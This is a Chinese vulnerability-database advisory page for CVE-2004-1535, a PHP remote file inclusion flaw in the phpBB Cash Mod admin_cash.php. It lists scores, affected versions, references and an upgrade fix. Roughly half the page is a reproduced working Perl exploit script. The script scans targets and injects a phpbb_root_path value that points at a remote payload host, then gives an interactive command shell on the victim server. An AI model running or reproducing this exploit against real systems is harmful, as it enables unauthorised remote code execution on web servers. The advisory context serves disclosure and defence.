CVE-2004-1535
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:55:58
NMCOE    

[原文]PHP remote file inclusion vulnerability in admin_cash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code.


[CNNVD]phpBB Cash Mod module admin_cash.phpPHP远程文件列入漏洞(CNNVD-200412-499)

        phpBB中Cash Mod module的admin_cash.php存在PHP远程文件列入漏洞。远程攻击者通过修改phpbb_root_path参数引用包含该代码的远程Web服务器上的URL,从而执行任意PHP代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:rc3
cpe:/a:phpbb_group:phpbb:rc4
cpe:/a:phpbb_group:phpbb:rc1
cpe:/a:phpbb_group:phpbb:rc2
cpe:/a:phpbb_group:phpbb:rc1_pre
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:2.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1535
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1535
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-499
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110075903308817&w=2
(UNKNOWN)  BUGTRAQ  20041118 Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
http://marc.info/?l=bugtraq&m=110082153702843&w=2
(UNKNOWN)  BUGTRAQ  20041118 Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
http://xforce.iss.net/xforce/xfdb/18151
(PATCH)  XF  phpbb-admincashphp-file-include(18151)

- 漏洞信息

phpBB Cash Mod module admin_cash.phpPHP远程文件列入漏洞
高危 未知
2004-12-31 00:00:00 2006-09-28 00:00:00
远程  
        phpBB中Cash Mod module的admin_cash.php存在PHP远程文件列入漏洞。远程攻击者通过修改phpbb_root_path参数引用包含该代码的远程Web服务器上的URL,从而执行任意PHP代码。
        

- 公告与补丁

        

- 漏洞信息 (24751)

PHPBB 2.0.x Admin_cash.PHP Remote PHP File Include Vulnerability (EDBID:24751)
php webapps
2004-11-17 Verified
0 Jerome Athias
N/A [点击下载]
source: http://www.securityfocus.com/bid/11701/info

A vulnerability is reported to exist in the phpBB Cash_Mod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system.

Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.

#####################################################
# phpBB2.pl exploit 2004 http://securityfocus.com/bid/11701
# Spawn bash style Shell with webserver uid
# Greetz foxtwo, Zone-H
# This Script is actually under development
#####################################################

use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
$U[2] = "/forum/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
        $output = $results[$X];
        if (defined $output){
        if ($output =~/IIS/){ $webserver = "apache" };
        };
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
        };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };
if ($flag eq "0") {
}else{
     };
};
if ($status eq "not_vulnerable"){

                                };
};
sub choose {
print "\nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "\nHELP QUIT URL SCAN Or Command

\n[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "\nOUTPUT FROM $host. \n\n";
my $display;
if ($probe eq "string") {
                        my $X;
                        for ($X=0; $X<=10; $X++) {
                        $display = $results[$X];
                        if (defined $display){print "$display";};
                        sleep 1;
                                };
                        }else{
                        foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
                          };
};
sub exit{
print "\n\n\n


 SPABAM 2004.";
print "\nspabam.da.ru spabam\@go.to";
print "\n\n\n";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        PHPBB2.0 - 2.0.10
        Command Execution Vulnerability by SPABAM 2004" ;
print "\n
";
print "\n phpBB2";
print "\n

note.. ORP";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};
		

- 漏洞信息

11928
phpBB Cash_Mod admin_cash.php Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

phpBB Cash_Mod contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin_cash.php not properly sanitizing user input supplied to the phpbb_root_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2004-11-17 Unknow
2004-11-17 Unknow

- 解决方案

Upgrade to version 2.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站